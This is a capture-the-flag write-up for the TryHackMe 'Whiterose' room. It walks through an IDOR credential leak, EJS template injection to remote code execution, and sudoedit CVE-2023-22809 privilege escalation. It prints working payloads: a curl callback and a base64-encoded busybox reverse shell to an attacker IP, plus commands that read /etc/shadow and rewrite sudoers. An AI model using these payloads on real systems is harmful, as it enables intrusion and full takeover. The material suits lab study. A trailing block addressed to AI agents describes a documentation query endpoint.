# Whiterose {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We start with an Nmap scan and find two open ports. On port 22 we have SSH and on port 80 we have an `ngix/1.14.0` web server.

When visiting the index page of the web servers, we are redirected to `cyprusbank.thm`. We add this to our `/etc/hosts` and reload the page. ``` whiterose.thm → cyprusbank.thm ```

After we have reloaded the page, we only see a static page without any functionality.

The directory scan did not reveal anything either.

The vhost scan using FFuF had revealed two vhosts, `www` and `admin`. Where `admin` points to a new page that we do not yet know. We add these to our `/etc/hosts`. {% code overflow="wrap" %} ``` ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1 ``` {% endcode %}

The directory scan using Feroxbuster does not reveal any other endpoints that we do detect manually too.

## Web Access Olivia Cortzez The index page of `admin.cyprusbank.thm` redirects us to a login page. Credentials for this login are obtained from the room description.

We can log in as `Olivia Cortez`, but that user has only have limited permission. We cannot read all the data, and the `settings` endpoint is not available to us.

## Web Access Gayle Bev But we can take a look at the news history. This is set to `?c=5` during the visit. The parameter `c` can be checked for IDOR. ``` http://admin.cyprusbank.thm/messages/?c=5 ```

With the parameter value `0` we find the credentials of an admin user `Gayle Bev`. ``` http://admin.cyprusbank.thm/messages/?c=0 ```

We use the found credentials to log in as `Gayle Bev` and are successful.

We are now able to read the telephone numbers.

## Shell as web As `Gayle Bev` we do have access to the settings endpoint. We can set the customer's passwords here. What is noticeable is that the passwords are reflected. This immediately draws attention to XSS or SSTI.

If we intercept a request and change it by omitting parameters such as the password, an error message appears. This tells us that ejs files are included.

In our search for SSTI payloads, we'll find the following two sources if `ejs`is included: {% embed url="" %} {% embed url="" %} We use the payload from the article and first try to call our web server to test whether it works. {% code overflow="wrap" %} ``` %%1");process.mainModule.require('child_process').execSync('curl http://10.14.90.235');// ``` {% endcode %}

We receive direct feedback. Great, we have an SSTI here that we can leverage to RCE.

Next, we prepare a revshell. We use a simple bas64 encoded busybox reverse shell, generated with `revshells.com`.

Next, we set up a listener and us the following payload to spawn a reverse shell. {% code overflow="wrap" %} ``` name=a&passord=b&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('bash -c "echo YnVzeWJveCBuYyAxMC4xNC45MC4yMzUgNDQ0NSAtZSAvYmluL2Jhc2g= | base64 -d | bash"');// ``` {% endcode %}

We receive a connection back and are the user `web`. In the home directory of `web` we find the first flag. After we have received our reverse shell, we then upgrade it. {% embed url="" %}

## Shell as root We see that we are allowed to run `sudoedit` as `root` without a password using sudo for the specific file `/etc/nginx/sites-available/admin.cyprusbank.thm`.

After a short search, we find a bypass `CVE-2023-22809` for `sudoedit`. This is applicable to sudo up to version `1.9.12p1`. The vulnerability allows us to read and edit any files by specifying the EDITOR variable. {% embed url="" %} We see that we have installed a vulnerable version of `sudo`.

With `export EDITOR="vi -- /etc/shadow"` we attempt to make `vi` open `/etc/shadow` directly when `sudoedit` is used. ``` export EDITOR="vi -- /etc/shadow" sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm ```

And we are able to read `/etc/shadows`.

Next, we try that with the root flag and are able to read it. ``` export EDITOR="vi -- /root/root.txt" sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm ```

To escalate our privileges to root, we attempt to edit the `/etc/sudoers` file. ``` export EDITOR="vi -- /etc/sudoers" sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm ``` Here we target the line with the command allowing us to execute that specifies the sudoedit command: ``` web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm ``` and replace it with the following: ``` web ALL=(root) NOPASSWD: ALL ```

Now we are able to execute any command as root without providing a password and use that to switch to the `root` user. As `root` we find the final flag at `/root/root.txt`.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/whiterose.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.